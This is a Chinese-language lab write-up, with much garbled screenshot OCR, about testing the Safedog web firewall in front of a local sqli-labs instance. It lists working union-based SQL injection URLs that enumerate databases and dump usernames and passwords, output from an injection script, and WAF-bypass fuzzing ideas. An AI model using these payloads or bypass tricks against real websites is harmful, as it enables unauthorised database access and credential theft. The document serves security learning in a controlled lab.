0x01 waf
安全狗 safedogwzApacheV3.5.exe
网站安全狗CAPACH版)43.5正式版本
加入服云
e网站安全狗
网马查杀
IP黑白名单
资源保护
主动防御
防护日志
流里保护
防护日志功能
已开启
保存
日主悼存干粉.
30
关于网站安全狗
日志类型:所有类型
当前版本:V3.5正式版本
时间
厦门服云信息科技有限公司("安全狗")是国内领先的云
t(schemaname)frominformati...
2021-04-1323:12:54网站漏洞
安全服务与解决方案提供商,兼承"安全狗即服务"(Safedog
e
a5aService)的理念,依托全球领先的安全技术与完善的大
网站漏洞
Iandor方式注入规则二可疑内容...
2021-0
数据处理平台,致力于为各行业客户提供最具核心竞争力的云
安全产品及解决方案,助力客户保障业务平台的安全,稳定
可靠运行
版权所有:厦门服云信息科技有限公司
确定
总记录数:2
下一页
当前页:1
跳至
上一页
总页数:1
确认
检查更新
网马库版本:2016-01-15
主程序版本:3.5,12048
0x02 搭建
网站:apache+mysql+php
phpstudy2018
php版本4.4.45
sqli-labs
phpStudy2018PHP-5.4.45
运行状态
phpStudy启停
Apache:
停止
启动
重启
MySQL:
提示信息
切换版本
运行模式
Apache已经停止...
22:13:39
系统服务
22:13:39
MVSQL已经停止...
22:13:39
正在启动进程...
非服务模式
22:13:40
Apache已经启动...
应用
22:13:40
MySOL已经启动...
MVSQL管理器
打开工具箱
其他选项菜单
快捷键配置
0x03 报错注入
关键句
select schema_name from information_schema.schemata; select table_name from information_schema.tables where table_schema='security'; select column_name from information_schema.columns where table_name='users'; select username,password from security.users;
手动注入
查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema='security' 查列:select column_name from information_schema.columns where table_name='users' 查字段:select username,password from security.users
(下面的内容不要直接复制) http://127.0.0.1/sqli/Less-1/?id=1’ 查看是否有注入 http://127.0.0.1/sqli/Less-1/?id=1‘ order by 3--+ 查看有多少列 http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,3--+ 查看哪些数据可以回显 http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,database()--+ 查看当前数据库 http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,schema_name from information_schema.schemata limit 4,1--+ 查看数据库security 或者是: http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 查看所有的数据库 http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表, 或者是: http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的 http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,column_name from information_schema.columns where table_name=0x7573657273--+ 查询列信息 或者是: http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+ 查看所以的列信息 http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,concat_ws(’~‘,username,password) from security.users limit 1,1--+ 查询一个账号和密码 或者是:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+ 直接可以得到所有的账号和密码, 并且使用~符号进行分割。
WelcomeDhakkan
YourLoginname:2
YourPassword:Dumb~Dumb.Angelina~l-ill
YUDUMTYPEOGSURYRROUBAMROBMYMAMURALAM?)
SQLIDUMBSEROBS
回控制台D调试器你网络门祥式综辑器性能
日存储前无障碍环境
查右器
照应用程序
民
0内存
AdblockPlus
HackTooks
HackBar
Encryption
EncodingsQLxssOther
Contributenow!HackBar2
LOaDURL
htp/0211559m
SPMfURL
Execute
OPostdataORefererOUserAgentocooklesClearA
工具注入
python31-errorgetinjctin
该ur[可注入,且一共存在3列
该url的数据库是:informationschem,chalteneqceceuy
该url中security所对应的表为:emails,referers,uagt,
该url中users所对应的字段值为:
Dm:mt.meLmH
minadmin,minmm
0x04 安全狗安装
网站安全狗(APACHE版)安装程序
APACHE的相关信息确定.注意事项:
1,请保证主配置目录有写权限,则会导致安装失败
2,请使用绝对路径形式.
3.服务名区分大小写?
4.请保证与你选择的安装包的Apache版本一致,否则会出现安装不正常
APACHE安装目录:
c:iphpstudy2018/phptutoriallapache
浏览
ServerRoot路径:
c:iphpstudy2018/phptutorial/apache
浏览
主配置路径:
c:/iphpstudy2018/phptutoriallapache/conf/ht.conf
浏览
主程序路径:
C:iphpstudy2018/phptutoriallapache/bin/httdexe
服务名:
版本的系列:
Apache2.0系列
Apache2.4系列
Apache2.2系列
确定
在安装的时候提示有一个服务名不能为空,这里需要phpstudy调整至系统服务模式。
PHP-5.4.45
phpStudy2018
运行状态
phpStudy启停
Apache:
重启
停止
启动
MySQL:
运行箱式
切场版本
提示信息
22:13:39
Apache已经停止...
系统服务
22:13:39
MySOL已经停止...
22:13:39
正在启动进程...
非服务模式
22:13:40
Apache已经启动...
应用
MySOL已经启动...
22:13:40
MVSQL管理器
其他选项菜单
快捷键配置
打开工具箱
然后调出任务管理器界面,查看所有服务
全
服务(本地)
登录为
描述
启动类型
名称
状态
apache
ActiveXInstaller(AxlnstSV
为...
手动
本地...
启动此服务
1
Adan+ivaDriabtnecc
木th
自动
本地.
iapache
描述:
确...
手动
本地...
ApplicationIdentity
Apache/2.4.23
手动
本地...
使...
透ApplicationInformation
Win32
为I...
手动
本地...
ApplicationLayerGatewayService
手动
使...
本地...
BackgroundIntelligentTransferService
BaseFilteringEngine
基...已.
本地...
自动
手动
BitLockerDriveEncryptionService
本地...
BD...
BlockLevelBackupEng
Wi...
本地...
EngineService
Blu...
本地...
BluetoothSupportService
将...
本地...
CertificatePropagation
手动
CNGKeyIsolation
CN...
本地...
支...
本地...
COM
EventSystem
自动
管...已...手动
COM+SystemApplication
本地...
维...已...手动
本地...
ComputerBrowser
为...
本地...
手动
CredentialManager
提...
自动
aCryptographicServices
网络...
自动
DC...
DCOMServerProcessLauncher
本地...
DesktopWindowManagerSessionMa...提...已...
本地...
自动
为...已...
DHCPClient
自动
本地...
DiagnosticPolicyService
本地...
诊...已...自动
本地...
诊...已...手动
DiagnosticServiceHost
本地...
诊...已...手动
DiagnosticSystemHost
网站安全狗(APACHE版)3.5正式版本
加入服云
双M
e
网站安全狗
请佳
资源保护IP黑白名单
网马查杀
主动防御
流量保护
防护日志
主动防御
您还未对服务器进行过网马扫描,建议立即扫描.
网站漏洞防护
已开启
规则设置
上次扫描时间:未扫描.
网马防护
规则设置
全站扫描
流量保护
扫描所有网站,更全面更安全
CC攻击防主
00000
低
已开启
规则设置
资源防护
自定义网站扫描
e
网站资源防盗链
扫描关键性网站,快速安全
已开启
规则设置
网站特定资源保护
已开启
规则设置
自定义路径扫描
网站后台防护
已开启
扫描关键路径,快速安全
规则设置
IP黑白名单
扫描设置
定时扫描
IP白名单
已开启
规则设置
IP黑名单
已开启
上报木马
查看隔离记录
查看历史记录
规则设置
网马库版本:2016-01-15
检查更新
主程序版本:3.5,12048
将服务写上,安装成功之后,注意不要选择在线安装服务器安全狗,安装之后会显示启动web服务失败,这里将phpstudy重启即可
使用恶意的参数进行测试下,安全狗生效
.
10.211.55.9/Less-1/id-'and1-1--+
ABP
出
Bing
网站防火墙
您的请求带有不合法参数,已被网站管理员设置拦截!
可能原因:您提交的内容包含危险的攻击请求
如何解决:
1)检查提交内容;
2)如网站托管,请联系空间提供商;
3)普通网站访客,请联系网站管理员;
安全狗-网站安全专家
其他人怎么说?
日存储
日控制台D调试器1网络门样式编辑器
一无障碍环境
0内存
查看器
口性能
应用程序
AdblockPlus
HackBar
HackTools
EncodingsQLxssOther
Contribu
Encryptlon
http://10.211.55.9/L/1
LoaDURL
SplitURL
运行脚本:
inje
python301
jection.py
get
error
该url可注入,且一共存在3列
Traceback(mostrecentcattlast):
File
"1errorgetinjctioi
main()
File"ol_error_get_injctiny
line115inmain
print(该url的数据库是:',database_re[o])
listindexoutofrange
IndexError:
网站防护日志:
网站安全狗APACHE版)3.5正式版本
加入服云
MA
网站安全狗
精尔
资源保护
网马查杀
IF黑白名单
防护日志
流里保护
主动防御
防护日志功能
保存
日志保存天数:
30
已开启
所有类型
查询
记录时间:丛
删除日志
到
日志类型:
2021/4/13
2022/4/13
类型
内容保护
时间
QL合查询可第内客unonselctgun
2021-04-1323:12:54网漏洞防护
10211552间10211559
2021-04-1323:11:18网站漏洞防护
下一页
总页数:1当前页:1总记录数:2
确认
跳至
上一页
网马库版本:2016-01-15
检查更新
主程序版本:3.5.12048
0x05 Fuzz
在mysql的fuzz里面一般有以下的思路:(不止)
使用大小写绕过 使用/**/注释符绕过 使用大的数据包绕过 使用/!**/注释符绕过 ……
1. 测试单引号
http://10.211.55.9/Less-1/?id=1'
显示正常
四
E
五
10.211.55.9/Less-1/id-1
移动设备
火
Bing
Dhakkan
Welcome
headusq
SQLIDUMBSBROBS
D
保
日存储
器你网络
查右器日控制台D调试器
骨样式编辑器
内存
AdblockPlus
性能
应用程序
无吃碍环境
HackTools
HackBar
ContributenowlHacke
EncryptionEncodingsoL-xss,Other
http://10.211.55.9/Less-/i
LoadURL
SpltURL
http://10.211.55.9/Less-1/?id=1' --+
显示正常
10.211.55.9/Less-1/2id1--
冰印
GeuBing
Welcome
Dhakkan
YourLoginname:Dumb
YourPassword:Dumb
SQLIDUMBSHRY
1网络
粤样式编辑器
日存储
性能
0内存
调试器
查看器
A
无障碍环境
应用程序
控制台
HackBarABPAdblockPlus
DevToolsPaneladdedby"HackBar"add-on.
XSS
Other
SQL
Encryption
Encoding
http://10.211.55.9/Less-1/?id-
LoadURL
SplitURl